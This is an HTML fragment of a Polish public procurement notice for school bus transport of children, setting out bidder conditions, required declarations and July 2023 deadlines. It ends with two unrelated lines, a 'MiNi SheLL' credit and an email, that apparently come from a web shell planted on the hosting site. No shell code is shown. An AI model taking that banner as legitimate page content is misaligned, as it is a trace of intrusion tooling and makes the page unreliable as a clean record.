class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunek udziału w postępowaniu dotyczący: zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie<br/>gospodarczym.<br/>2. Warunek udziału w postępowaniu dotyczący: uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>2.1.Warunek udziału w postępowaniu dotyczący posiadania uprawień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, zostanie spełniony, jeżeli Wykonawca będzie posiadać aktualną licencję na wykonywanie krajowego lub<br/>międzynarodowego transportu drogowego w zakresie przewozu osób.<br/>2.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w pkt 2.1 będzie<br/>spełniony, jeżeli każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o których<br/>mowa w pkt 2.1.<br/>Warunek określony w pkt 2.1, będzie także spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia, o których mowa w pkt 2.1, i zrealizuje usługi, do których realizacji te<br/>uprawnienia są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (oświadczenie o którym mowa w art.<br/>117 ust 4 ustawy Pzp) .<br/>3. Warunek udziału w postępowaniu dotyczący: sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>4. Warunki udziału w postępowaniu dotyczące: zdolności technicznej lub zawodowej:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu<br/>dotyczące zdolności technicznej lub zawodowej:<br/>4.1. Warunek dotyczący potencjału technicznego Wykonawcy zostanie<br/>spełniony, jeżeli Wykonawca będzie dysponował co najmniej 1 (jednym) pełnosprawnym autobusem,<br/>posiadającym aktualne badania techniczne, który umożliwi przewóz łącznie 11 (jedenastu) osób, bez kierowcy (z miejscami<br/>siedzącymi dla wszystkich dzieci oraz opiekuna);<br/>4.2. Warunek dotyczący wykształcenia i kwalifikacji zawodowych osób skierowanych przez Wykonawcę do realizacji<br/>zamówienia, zostanie spełniony, jeżeli Wykonawca będzie dysponował:<br/>a) co najmniej jednym kierowcą autobusu posiadającym<br/>odpowiednie do oferowanego środka transportu prawo jazdy<br/>oraz<br/>b) co najmniej jednym opiekunem dzieci przeszkolonym z pomocy<br/>przedmedycznej lub posiadającym dyplom pielęgniarki zawodowej/<br/>pielęgniarza zawodowego. Opiekunem musi być osoba posiadająca pełną zdolność do czynności prawnych, pełnoletnia,<br/>dająca rękojmię bezpiecznego dojazdu dzieci do szkoły i ze szkoły. Ponadto opiekun nie może widnieć w rejestrze<br/>sprawców przestępstw na tle seksualnym.<br/>4.3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. przez konsorcjum):<br/>a) warunek udziału w postępowaniu określony odpowiednio w pkt 4.1 winien spełniać samodzielnie co najmniej jeden z tych<br/>wykonawców,<br/>b) warunek udziału w postępowaniu określony odpowiednio w pkt 4.2 lit a winien spełniać samodzielnie co najmniej jeden z<br/>tych wykonawców,<br/>c) warunek udziału w postępowaniu określony odpowiednio w pkt 4.2 lit b winien spełniać samodzielnie co najmniej jeden z<br/>tych wykonawców<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, iż łącznie spełniają warunki udziału w<br/>postępowaniu.<br/>W odniesieniu do warunków dotyczących wykształcenia i kwalifikacji zawodowych osób skierowanych przez Wykonawcę do<br/>realizacji zamówienia, o których mowa w pkt 4.2 wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (oświadczenie, o którym mowa w art. 117<br/>ust 4 ustawy Pzp).<br/>Udostępnianie zasobów<br/>4.4. Wykonawca może, w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach, w<br/>odniesieniu do przedmiotowego zamówienia, polegać na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>W odniesieniu do warunków dotyczących wykształcenia i kwalifikacji zawodowych osób skierowanych przez Wykonawcę do<br/>realizacji zamówienia, o których mowa w pkt 4.2 Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.5. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej, musi potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w<br/>szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych, zrealizuje usługi, których<br/>wskazane zdolności dotyczą.<br/>4.6. Zamawiający oceni, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt<br/>4.1 i 4.2 a także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane<br/>względem wykonawcy.<br/>4.7. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający<br/>zażąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub<br/>podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>4.8. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających<br/>zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających<br/>zasoby.<br/>4.9. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na<br/>zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie<br/>spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie<br/>postępowania o udzielenie zamówienia. Postanowienia pkt 4.7. stosuje się odpowiednio. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W przedmiotowym postępowaniu Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do<br/>wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 21.2 i 21.4 SWZ, Zamawiający wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym przez siebie terminie, nie krótszym niż 5 dni od<br/>dnia wezwania, aktualnych na dzień ich złożenia następujących podmiotowych środków dowodowych:<br/>1) aktualnej licencji na wykonywanie krajowego lub międzynarodowego transportu drogowego w zakresie przewozu osób<br/>2) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia wraz z<br/>informacją<br/>o podstawie dysponowania tymi zasobami (wykazu środków transportu) (wg wzoru Załącznik Nr 4 do SWZ)<br/>3) wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień, niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (wg<br/>wzoru Załącznik Nr 5 do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) „Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu” (oświadczenie o którym<br/>mowa w art. 125 ust 1 ustawy Pzp) wg wzoru stanowiącego Załącznik Nr 2 do SWZ. W przypadku oferty składanej wspólnie<br/>(np. przez konsorcjum) „Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu”<br/>(oświadczenie, o którym mowa w art. 125 ust 1 ustawy Pzp) składa każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu i w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Jeżeli<br/>Wykonawca polega na zdolnościach podmiotów udostępniających zasoby wraz z ww. oświadczeniem przedstawia także<br/>oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu w zakresie w jakim wykonawca powołuje się na jego zasoby. W sytuacji o której mowa w<br/>pkt 15.3 SWZ Wykonawca wraz z ww. oświadczeniem dołącza do oferty, dowody, że spełnił łącznie przesłanki o których<br/>mowa w pkt 15.3 SWZ.<br/>2) w celu potwierdzenia, że osoba działająca w imieniu wykonawcy, wykonawcy wspólnie ubiegającego się o udzielnie<br/>zamówienia lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania – odpis/y lub informacja/e z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych a wykonawca wskaże w ofercie dane umożliwiające dostęp do tych<br/>dokumentów.<br/>W przypadku wskazania przez wykonawcę dostępności dokumentów, o których mowa powyżej, pod określonymi adresami<br/>internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający będzie żądać przedstawienia tłumaczenia na język<br/>polski pobranych samodzielnie dokumentów.<br/>3) jeżeli osoba (osoby) podpisująca ofertę działa na podstawie pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie do reprezentowania wykonawcy - pełnomocnictwo lub inny dokument potwierdzający umocowanie do<br/>reprezentowania wykonawcy,<br/>4) jeżeli osoba (osoby) podpisująca dokumenty lub oświadczenia dotyczące odpowiednio podmiotu udostępniającego<br/>zasoby lub wykonawcy wspólnie ubiegającego się o udzielenie zamówienia działa na podstawie pełnomocnictwa lub innego<br/>dokumentu potwierdzającego umocowanie do reprezentowania odpowiednio podmiotu udostępniającego zasoby lub<br/>wykonawcy wspólnie ubiegającego się o udzielenie zamówienia - pełnomocnictwo lub inny dokument potwierdzający<br/>umocowanie do reprezentowania odpowiednio podmiotu udostępniającego zasoby lub wykonawcy wspólnie ubiegającego<br/>się o udzielenie zamówienia,<br/>5) jeżeli Wykonawca polega na zdolnościach podmiotów udostępniających zasoby - zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów,<br/>6) w przypadku gdy Wykonawcy wspólnie będą ubiegać się o udzielenie zamówienia - pełnomocnictwo do reprezentowania<br/>w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego,<br/>7) w przypadkach, o których mowa w pkt 12.9.3 SWZ - oświadczenie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy (oświadczenie o którym mowa w art.<br/>117 ust 4 ustawy Pzp),<br/>8) inne – wg potrzeb i postanowień niniejszej SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty składanej wspólnie (np. przez konsorcjum), Wykonawcy wspólnie ubiegający się o zamówienie<br/>zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo<br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (zgodnie z art. 58 ust. 2 ustawy<br/>– Prawo zamówień publicznych). W takim przypadku do oferty należy dołączyć pełnomocnictwo do reprezentowania<br/>Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo może również wynikać z innego dokumentu potwierdzającego<br/>umocowanie do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Przyjmuje się, że ww. pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia<br/>publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego obejmuje również<br/>pełnomocnictwo (umocowanie) do podpisania oferty.<br/>W takim przypadku wszelka korespondencja będzie prowadzona z Pełnomocnikiem.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie<br/>Umowy zgodnie z jej postanowieniami.<br/>2. W przypadku oferty składanej wspólnie (np. przez konsorcjum) każdy wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na postawie art. 108 ust. 1 ustawy<br/>Prawo zamówień publicznych, a także na podstawie art. 7 ust. 1. ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w pkt 21.2.1 SWZ<br/>będzie spełniony, jeżeli każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o<br/>których mowa w pkt 21.2.1. SWZ. Warunek określony w pkt 21.2.1, SWZ będzie także spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o których mowa w pkt 21.2.1 SWZ, i<br/>zrealizuje usługi, do których realizacji te uprawnienia są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy (oświadczenie o którym mowa w art. 117 ust 4 ustawy Pzp) . Ponadto w przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. przez konsorcjum) :<br/>a) warunek udziału w postępowaniu określony odpowiednio w pkt 21.4.1 SWZ winien spełniać samodzielnie co najmniej<br/>jeden z tych wykonawców,<br/>b) warunek udziału w postępowaniu określony odpowiednio w pkt 21.4.2 lit a SWZ winien spełniać samodzielnie co najmniej<br/>jeden z tych wykonawców,<br/>c) warunek udziału w postępowaniu określony odpowiednio w pkt 21.4.2 lit b SWZ winien spełniać samodzielnie co najmniej<br/>jeden z tych wykonawców.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, iż łącznie spełniają warunki udziału w<br/>postępowaniu. W odniesieniu do warunków dotyczących wykształcenia i kwalifikacji zawodowych osób skierowanych przez<br/>Wykonawcę do realizacji zamówienia, o których mowa w pkt 21.4.2 SWZ wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane. W przypadku, o którym mowa powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (oświadczenie, o którym mowa w<br/>art. 117 ust 4 ustawy Pzp).<br/>4. Pozostałe wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>- zgodnie z SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z dokumentami zamówienia tj. zapisami projektowanych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na stronie internetowej prowadzonego postępowania za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com